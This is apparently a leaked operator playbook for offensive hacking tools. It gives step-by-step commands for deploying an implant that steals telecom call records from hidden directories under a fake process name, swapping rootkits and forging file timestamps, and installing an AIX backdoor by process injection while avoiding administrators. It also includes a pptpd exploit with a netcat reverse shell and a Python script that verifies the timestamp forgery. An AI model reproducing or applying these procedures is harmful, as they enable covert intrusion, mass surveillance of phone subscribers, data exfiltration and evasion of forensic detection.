## to encrypt all at the same time (only the .txt files, so a re-run does not re-encrypt the .enc output):
for i in argfile*.txt ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i .txt`.enc -k CRYPTKEY -b ; done
ls -l
file argfile*.enc
##
## on target look at CDR directories:
## - use the following commands to determine the location of current CDR data storage
## - once you identify the location of the data, you'll use the head/tail commands
##   to determine the date ranges being saved
## - these date ranges will be used as settings in the ER configuration file(s)
##
## typical file locations per host:
##
#########################
aromaseal:
#########################
desertvista:
-lt /var/archive/output_billing
-vget /var/archive/output_billing/MoveData.sh
#########################
diamondaxe:
##########################
editionhaze:
## billing02 10.100.10.140
ls -latr /d08/saba/CDR/out/MS* | head -10
ls -latr /d08/saba/CDR/out/MS* | tail -10
ls -latr /d08/saba/CDR/out/MS* | wc -l
##########################
liquidsteel:
##########################
serenecosmos:
ls -latr /var/opt/archive/tape/*/*_S_*.gz | head -10
ls -latr /var/opt/archive/tape/*/*_S_*.gz | tail -10
##########################
sicklestar:
## magnum: CURSEHAPPY not working on all SS .usd files :-(
## Try these first, should be all of them in one spot
ls -latr /usd_archive/mc_storage/*usd | head -10
ls -latr /usd_archive/mc_storage/*usd | tail -10
## if none in previous ones...
ls -latr /sys1/var/billing/out_coll/*usd | head -10
ls -latr /sys1/var/billing/out_coll/*usd | tail -10
ls -latr /sys1/var/alcatel/out_coll/*usd | head -10
ls -latr /sys1/var/alcatel/out_coll/*usd | tail -10
ls -latr /sys1/var/billing/msc_is2 | tail -20
#########################
qualitygel:
##########################
wholeblue:
## tpmw01 10.3.4.55
## tpmw02 10.3.4.56
## verifies isb, khi, and lhr directories:
ls -ld /tp/med/datastore/collect/siemens_msc_*
ls -ld /tp/med/datastore/collect/siemens_msc_*/.tmp_ncr
ls -ld /tp/med/archive/collect/siemens_msc_*
ls -ld /tp/med/archive/collect/siemens_msc_*/.tmp_ncr
## shows oldest and newest files in directories:
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*isb*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*khi*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/datastore/collect/*lhr*/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_khi01/.tmp_ncr/*.MSC | tail -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | head -10
ls -latr /tp/med/archive/collect/siemens_msc_lhr01/.tmp_ncr/*.MSC | tail -10
## isbapro1 10.5.7.51
## nothing new
-lt /u01/product_evdp/evident/data_store/collect
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_khi01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_isb01 | tail -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | head -10
ls -latr /u01/product_evdp/evident/data_store/collect/siemens_msc_lhr01 | tail -10
-lt /u03/archive/collect
## newer stuff
ls -latr /u03/archive/collect/siemens_msc_isb01 | head -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | tail -10
ls -latr /u03/archive/collect/siemens_msc_isb01 | wc -l
## old stuff:
ls -latr /u03/archive/collect/siemens_msc_khi01 | head -10
ls -latr /u03/archive/collect/siemens_msc_khi01 | tail -10

#############
## COLLECT ##
#############
##
## cd to hidden directory where ENEMYRUN is set up
## when in the hidden directory, there could be two subdirectories;
## one for a forward instance and one backward (e.g. erf and erb)
##
-cd IMPLANT_HIDDEN_DIRECTORY
##
## there should be files in:
##   er*/aux_*/output/final
## and possibly, if parsing is occurring:
##   er*/aux_*/output
##
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## stop current instances of ENEMYRUN
## need name of process ENEMYRUN is running as on target; should be on plan, or check old opnotes
## ER_PROCESS_NAME: name under which ENEMYRUN is running on target; try nscd, which will look like ./nscd
##
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## kill with SIGTERM; if it doesn't work use kill -9
## ENEMYRUN_PID: process id under which ENEMYRUN is running on target
kill -15 ENEMYRUN_PID
##
## collect parsed CDRs and logs created from the backward directory
## files are encrypted
##
-get IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
-get IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## in a local window make sure you have them all:
ls -laR /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*
##
## clean ER directories
##
## remove parsed CDRs
rm -fr IMPLANT_HIDDEN_DIRECTORY/er*/aux_*/output/final/*
## remove old logs
rm -f IMPLANT_HIDDEN_DIRECTORY/er*/logs/final/log*
## remove the status.log file >>>ONLY<<< from the >>>BACKWARDS<<< directory
rm -f IMPLANT_HIDDEN_DIRECTORY/erb/status.log
-ls -R er*
-ls -R IMPLANT_HIDDEN_DIRECTORY/er*
##
## edit ER configuration files
##
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should usually not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## probably have to change START_DAY and STOP_DAY
##   START_DAY: YYYYMMDD   # day backwards in time from which to start
##   STOP_DAY:  YYYYMMDD   # day forwards from START_DAY: to stop
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files and save
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_bwd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_fwd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc

## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erb/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
##   cp adm1 adm2
##   cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_bwd.enc IMPLANT_HIDDEN_DIRECTORY/erb/ecb
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erb
L='-I ecb -k CRYPTKEY'; export L; ./nscd
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## backward ENEMYRUN_PROCESS_NAME
## pid:
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erb directory after ER is running
## if the parser has started, these files should grow
##   logs IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/Log.*
##   hits IMPLANT_HIDDEN_DIRECTORY/erb/aux_1/output/.*
-ls -R erb
-ls -R IMPLANT_HIDDEN_DIRECTORY/erb

## -------------- ##
## FORWARDS FILES ##
## -------------- ##
##
## put up encrypted files
##
## encrypted argfile(s)
-put /current/down/argfiles/argfile1.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## or
-put /current/down/argfiles/argfile_forward.enc IMPLANT_HIDDEN_DIRECTORY/erf/adm1
## copy adm1 for each aux_* directory you see
## e.g. if you see aux_1 aux_2 aux_3 then:
##   cp adm1 adm2
##   cp adm1 adm3
## encrypted ER configuration file
-put /current/down/er_PROJECTNAME/er_conf_fwd.enc IMPLANT_HIDDEN_DIRECTORY/erf/ecf
##
## start ENEMYRUN
## may not work w/ PATH=.
## CRYPTKEY must be the same as in the ER configuration file
##
-cd IMPLANT_HIDDEN_DIRECTORY/erf
L='-I ecf -k CRYPTKEY'; export L; ./nscd
#ps -ef | grep ENEMYRUN_PROCESS_NAME
ps -ef | grep nscd
## record ER process pid(s) in opnotes
## DDMonYY
## forward ENEMYRUN_PROCESS_NAME
## pid: ER_PID
ps -ef | grep ENEMYRUN_PID
## the argfile(s) should no longer be in the erf directory after ER is running
## if the parser has started, these files should grow
##   logs IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/Log.*
##   hits IMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/.*
-ls -R erf
-ls -R IMPLANT_HIDDEN_DIRECTORY/erf
##
## once all required ER instances are running, you're done
##
-cd /tmp
-burnBURN
##
## decrypt parsed CDRs locally
##
## single aux* directory
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erb
## and/or
cd /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/erf/aux_1/output/final
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.txt -k CRYPTKEY -d -c -b ; done
## multiple aux* directories
mkdir /current/down/coll
cp /current/down/HOSTNAME.IPIMPLANT_HIDDEN_DIRECTORY/er*/aux*/output/final/* /current/down/coll
cd /current/down/coll
for i in * ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o `basename $i`.txt -k CRYPTKEY -d -c -b ; done
##
## copy decrypted data to media / remove ER tar from /current/down
##
ls -la *.txt
mz
cp *.txt /mnt/zip*/PROJECTNAME
ls -la /mnt/zip*/PROJECTNAME
uz
rm /current/down/er_*.tar

############
## DEPLOY ##
############
##
## edit ER configuration files
##
## in a local window
cd /current/down/er_PROJECTNAME
## find ER configs
ls -la er_conf*.txt
## should not have to edit the forward config, er_conf_fwd*.txt
## edit the backwards config, er_conf_bwd*.txt
vi er_conf_bwd.txt
## make sure you've made date range changes, or any other changes,
## to the plaintext ER configuration files
##
## encrypt required ER files
##
## encrypt the ER backwards configuration file
cd /current/down/er_PROJECTNAME
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_bwd.txt -o /current/down/er_PROJECTNAME/er_conf_bwd.enc -k CRYPTKEY -b
## encrypt the ER forwards configuration file
cryptTool.v1.0.Linux2.4.18-14.targetdl -i /current/down/er_PROJECTNAME/er_conf_fwd.txt -o /current/down/er_PROJECTNAME/er_conf_fwd.enc -k CRYPTKEY -b
file /current/down/er_PROJECTNAME/er_conf_*.enc
## encrypt CURSEHAPPY definition file if using CURSEHAPPY
for i in /current/up/cursedefs/*.def ; do cryptTool.v1.0.Linux2.4.18-14.targetdl -i $i -o /current/up/cursedefs/`basename $i .def`.enc -k CRYPTKEY -b ; done
ls -la
file /current/up/cursedefs/*.enc
##
## put up directories and tools only if deploying ENEMYRUN
## this means only put up these files/tools if they are not on the target yet
## if you have the least doubt about what you're doing, find someone who knows
##
## --------------- ##
## BACKWARDS FILES ##
## --------------- ##
-put /current/down/er_PROJECTNAME/erb_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erb.tar
tar xvf erb.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erb
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erb/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erb/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erb.tar

## -------------- ##
## FORWARDS FILES ##
## -------------- ##
-put /current/down/er_PROJECTNAME/erf_dirs.tar IMPLANT_HIDDEN_DIRECTORY/erf.tar
tar xvf erf.tar
-cd IMPLANT_HIDDEN_DIRECTORY/erf
-ls -R
## put up applicable parser(s)
-put /current/up/skimcountry.v1.2.SunOS5.9.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/cursehappy4 IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/orleansstride.v2.3.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/cursemagic.v1.0.0.0.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
-put /current/up/cursegismo.v1.1.0.4.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/crond
## encrypted CURSEHAPPY definition file
-put /current/up/cursedefs/PROJECTNAME.enc IMPLANT_HIDDEN_DIRECTORY/erf/cd
## put up enemyrun
-put /current/up/enemyrun.v2.3.1.3.SunOS5.8.targetdl IMPLANT_HIDDEN_DIRECTORY/erf/nscd
## if everything looks good remove tar
-rm IMPLANT_HIDDEN_DIRECTORY/erf.tar
##
## to continue the setup process go to the COLLECT section item titled:
## "edit ER configuration files"
##
###
### END File user.tool.enemyrun.COMMON
### (see also ../etc/user.tool.enemyrun.COMMON)
###

### BEGIN File user.tool.linux_remove_in_install_ss.COMMON (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON)
###
### Upgrading a Linux Incision to a Stoicsurgeon
###
### Step 1: Trigger Incision or -elevate
###
### Step 2: Save timestamps of affected files/directories
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/beforetimes
###
### Step 3: Upload dittlelight
-put /current/up/hidelite.linux h
###
### Step 4: Need a nopen callback window to use dittlelight (will not
###         work on any pids with parents that aren't 1, and callback
###         windows do that)
-nrtun PORT -call REDIR_IP:PORT
###
### Step 5: In the callback window, get your PID (and make sure the
###         PPID is 1)
-pid
###
### Step 6: Unhide your callback window
./h -u -p CALLBACK_PID
###
### Step 7: Make sure you are unhidden by comparing process listings
###         and directory listings; there should be differences
ps -ef | grep sendmail
-lt /dev/ttyi*
###
### Step 8: In unhidden window, trigger Incision self-destruct
touch /dev/ttyia3
###
### Step 9:
###         Repeat step 7, except now instead of being different,
###         the two windows should now be the same because Incision
###         is gone, so everything is unhidden
ps -ef | grep sendmail
-lt /dev/ttyi*
###
### Step 10: Remove file we touched/"created"
-rm /dev/ttyia3
###
### Step 11: At this point, follow the "user.tool.stoicsurgeon"
###          script in /current/etc to install Stoicsurgeon
###
### Step 12: Once Stoicsurgeon is installed, restore timestamps
###          for the files/dirs affected by the Incision uninstall.
###          These are saved in "/current/down/beforetimes" from Step 2.
###          NOTE: If "-ctrl" does not work, upload and run the standalone
###          "Ctrl" program, computing the SEED variable as described
###          in the "user.tool.stoicsurgeon" script if needed, or
###          you can trigger and not need the SEED
-ctrl -s /sbin/init ATIME 0 MTIME 0 CTIME 0
-ctrl -s /sbin ATIME 0 MTIME 0 CTIME 0
-ctrl -s /dev ATIME 0 MTIME 0 CTIME 0
###
### Step 13: Confirm timestamps are restored
###          This is a bit tricky to see that everything is right, so
###          confirm that:
###          1. everything for /sbin should match (i.e. no diff line)
###          2. there should be no /dev/ttyia* files in aftertimes
###          3. /dev may not match exactly if there were changes, but
###             /dev can change a lot so not a huge deal
###          4. the timestamps for /sbin/init should be the same in
###             beforetimes and aftertimes
###          5. the inode field (8th field in stat output) from
###             /dev/ttyia1 in beforetimes should match inode field
###             from /sbin/init in aftertimes
stat -t /dev /sbin /sbin/init /dev/ttyi* >L:/current/down/aftertimes
-lsh diff /current/down/beforetimes /current/down/aftertimes
###
### All done!
###
###
### END File user.tool.linux_remove_in_install_ss.COMMON
### (see also ../etc/user.tool.linux_remove_in_install_ss.COMMON)
###

### BEGIN File user.tool.slyheretic.COMMON (see also ../etc/user.tool.slyheretic.COMMON)
###
#########################################################
# SLYHERETIC v1.0.5.0
#########################################################
### SLYHERETIC is a light-weight implant for AIX 5.1 and AIX 5.2. It uses Hide-in-Plain-Sight techniques to provide stealth.
### SlyHeretic_Persistent: This installer injects a backdoor into a system process and persists across system reboots.
### SlyHeretic_OneShot: This installer injects a backdoor into a system process and does not persist across system reboots.
### All SLYHERETIC binaries delete themselves upon execution.

**IMPORTANT: SINCE SLYHERETIC uses Hide-in-Plain-Sight techniques to provide stealth, ensure that you get off of the box if known administrators are on the box.**
**IMPORTANT: Do not install SLYHERETIC on systems where TripWire is installed.**
***********************************

#########################################################
Persistent Install
#########################################################
## To install the Persistent version of SLYHERETIC perform the following steps.
## Upload the SlyHeretic_Persistent binary to the target with the name 'date' on a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Persistent date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code by looking at the 'date' string reported. The installer will report a 'date' string with the
## seconds field as the error code.
## If the seconds field reports '00', the installation was successful. If you get an error code in the seconds field, start
## troubleshooting. The most common error is '09': no viable injection process was available at that particular
## installation time. SLYHERETIC checks the process state prior to injecting, so it may determine that no processes are good
## candidates for injection. Wait a minute and try the install again. If that does not work, contact the tool champion or developer.

#########################################################
OneShot Install
#########################################################
## Upload the SlyHeretic_OneShot binary to the target with the name 'date' on a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_OneShot date
### Execute the installer with the following command:
PATH=. date
## Check the installer error code exactly as for the Persistent install above: the seconds field of the reported 'date'
## string is the error code, '00' is success, and '09' means no viable injection process was available (wait a minute and retry;
## if that does not work, contact the tool champion or developer).

#########################################################
Uninstalling SLYHERETIC
#########################################################
## Upload the SlyHeretic_Uninstaller binary to the target with the name 'date' on a filesystem that's not mounted noexec.
-put /current/up/SlyHeretic_Uninstaller date
### Execute the uninstaller with the following command:
PATH=. date
## The Uninstaller will not provide any output stating that the uninstall was successful. To verify the uninstall you can
## attempt to trigger via tipoff or -irtun.

#########################################################
SLYHERETIC REINSTALL
#########################################################
## SLYHERETIC can be reinstalled on a system but only after an Uninstall has taken place. A reinstall is simply the following steps:
##   Uninstall SLYHERETIC
##   Install SLYHERETIC

#########################################################
TRIGGERING SLYHERETIC
#########################################################
## Trigger SLYHERETIC and upload NOPEN with redirection.
-irtun TARGET_IP RANDOM_PORT -ueY5
******** SLYHERETIC uses DewDrop 3.X trigger ********
###
### END File user.tool.slyheretic.COMMON
### (see also ../etc/user.tool.slyheretic.COMMON)
###

### BEGIN File user.tool.entrymanor.COMMON (see also ../etc/user.tool.entrymanor.COMMON)
###
###################################################
### ENTRYMANOR
entrymanor binary: xp_pptpd
###################################################
2008-01-15 08:15:21 EST
Usage: ./xp_pptpd -i -p -l -r
    -i target
    -p port
    -l local IP
    -r local port
    -v verify server
    -t timeout in seconds
    -s stack location
    -h help
    -d debug

Check:
./xp_pptpd -i 127.0.0.1 -p 1723 -v
Then:
nc -vv -l -p 5492
./xp_pptpd -i 127.0.0.1 -p 1723 -l 555.1.2.22 -r 5492

0. will fail on pptpd versions greater than 1.1.4-b3 and 1.1.3-20030409.
1. Determine if the configuration of the target is exploitable by using the -v option.
   ./xp_pptpd -i 127.0.0.1 -p 1723 -v
2. (In Window 1, type the following command)
   # nc -vv -l -p 5492
   listening on [any] 5492 ...
   (after several seconds or minutes) ...
   555.1.2.171: inverse host lookup failed: Unknown host
   connect to [555.1.2.22] from (UNKNOWN) [555.1.2.171] 1047
   (In Window 2, type the following command (use shell if running on linux pitch))
   # ./xp_pptpd -i 555.1.2.171 -p 1723 -l 555.1.2.22 -r 5492
   Bruteforcing against 555.1.2.171
   interrupt when you get a shell to 555.1.2.22 on port 5492...
   * connecting... [ret=0xbfffff00]..sending done
   * connecting... [ret=0xbffffece]..sending done
   * connecting... [ret=0xbffffe9c]..sending done
   * connecting... [ret=0xbffffe6a]..sending done
   * connecting... [ret=0xbffffe38]..sending done
   * connecting... [ret=0xbffffe06]..sending done
   ...
   * connecting... [ret=0xbffff82a]..sending done
   * connecting... [ret=0xbffff7f8]..sending done
   * connecting... [ret=0xbffff7c6]..sending done
   (Hit c when you get a connection back in netcat.)
###
### END File user.tool.entrymanor.COMMON
### (see also ../etc/user.tool.entrymanor.COMMON)

#### BAIL
-cd /tmp/socket-root
-cd ..
-ls
rm -rf /tmp/socket-root
-ls

#### AT JOB (CAREFUL! These can log.)
at -l
at -r ATJOB
at -l
-burn

#### PITCHIMPAIR-LINUX #### some.target.ip #### 1.2.3.4 #### /tmp/socket-root
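Step 13 of the Incision-to-Stoicsurgeon notes above lists five things to confirm by eye in the diff of beforetimes and aftertimes. As an added example that is not part of the original notes (nor of any of the tools they mention), the Python below parses the two `stat -t` captures and applies those checks mechanically. It assumes the GNU coreutils terse layout (path first, inode as the 8th field, as the notes say, then atime/mtime/ctime as fields 12 to 14), assumes no spaces in the captured paths, and uses constructed before/after captures whose inode numbers and epoch timestamps are invented.

```python
# stat -t (GNU coreutils terse format) prints one line per path:
#   name size blocks mode uid gid dev inode nlink major minor atime mtime ctime [birth] iosize
# 0-based positions used here: 0 name, 7 inode, 11..13 atime/mtime/ctime.
NAME, INODE, ATIME, CTIME_END = 0, 7, 11, 14


def parse_stat_t(text):
    """Map path -> {'raw': line, 'inode': str, 'times': (atime, mtime, ctime)}.
    Assumes paths contain no spaces (true for the paths the notes capture)."""
    rows = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) < CTIME_END:          # blank lines / stat error lines are skipped
            continue
        rows[f[NAME]] = {"raw": line.strip(), "inode": f[INODE], "times": tuple(f[ATIME:CTIME_END])}
    return rows


def check_restore(before_text, after_text, init="/sbin/init", stash="/dev/ttyia1", hidden_prefix="/dev/ttyia"):
    """Apply the Step 13 checks. Every key except 'dev_changed' must be True.
    `stash` is the path the notes say holds the original init's inode beforehand."""
    b, a = parse_stat_t(before_text), parse_stat_t(after_text)

    def same(path, key):
        return path in b and path in a and b[path][key] == a[path][key]

    return {
        # 1. the /sbin directory line is identical (no diff line)
        "sbin_unchanged": same("/sbin", "raw"),
        # 2. no /dev/ttyia* entries survive in aftertimes
        "no_hidden_ttys": not any(p.startswith(hidden_prefix) for p in a),
        # 3. /dev may legitimately differ; reported, not judged
        "dev_changed": not same("/dev", "raw"),
        # 4. /sbin/init carries the same atime/mtime/ctime as before
        "init_times_restored": same(init, "times"),
        # 5. the inode that was /dev/ttyia1 before is /sbin/init after
        "init_is_original_inode": stash in b and init in a and b[stash]["inode"] == a[init]["inode"],
    }


def restore_ok(results):
    return all(v for k, v in results.items() if k != "dev_changed")


# Constructed sample captures (inode numbers and epoch times are invented).
BEFORE = """\
/dev 4096 8 41ed 0 0 803 2 14 0 0 1096291200 1096291200 1096291200 4096
/sbin 4096 8 41ed 0 0 803 12345 2 0 0 1096291000 1080000000 1080000000 4096
/sbin/init 27000 56 81ed 0 0 803 12347 1 0 0 1096291100 1096200000 1096200000 4096
/dev/ttyia1 26000 56 81ed 0 0 803 9001 1 0 0 1096291100 1080000000 1080000000 4096
/dev/ttyia2 512 8 81ed 0 0 803 9002 1 0 0 1096291100 1096200000 1096200000 4096
"""
AFTER = """\
/dev 4096 8 41ed 0 0 803 2 12 0 0 1096291200 1096291200 1096291200 4096
/sbin 4096 8 41ed 0 0 803 12345 2 0 0 1096291000 1080000000 1080000000 4096
/sbin/init 26000 56 81ed 0 0 803 9001 1 0 0 1096291100 1096200000 1096200000 4096
"""
# Same capture, but the stashed init was left behind and the init timestamps were not restored.
AFTER_BAD = AFTER.replace("1096291100 1096200000 1096200000", "1096300000 1096300000 1096300000") + \
    "/dev/ttyia1 26000 56 81ed 0 0 803 9001 1 0 0 1096291100 1080000000 1080000000 4096\n"

if __name__ == "__main__":
    for label, after in (("clean", AFTER), ("bad", AFTER_BAD)):
        r = check_restore(BEFORE, after)
        print(label, "OK" if restore_ok(r) else "FAIL", r)
```

Run it against the real captures with `check_restore(open("beforetimes").read(), open("aftertimes").read())`; the `dev_changed` flag is reported only so the operator can decide whether the /dev differences are the expected ones (the removed ttyia entries change its link count) or something else.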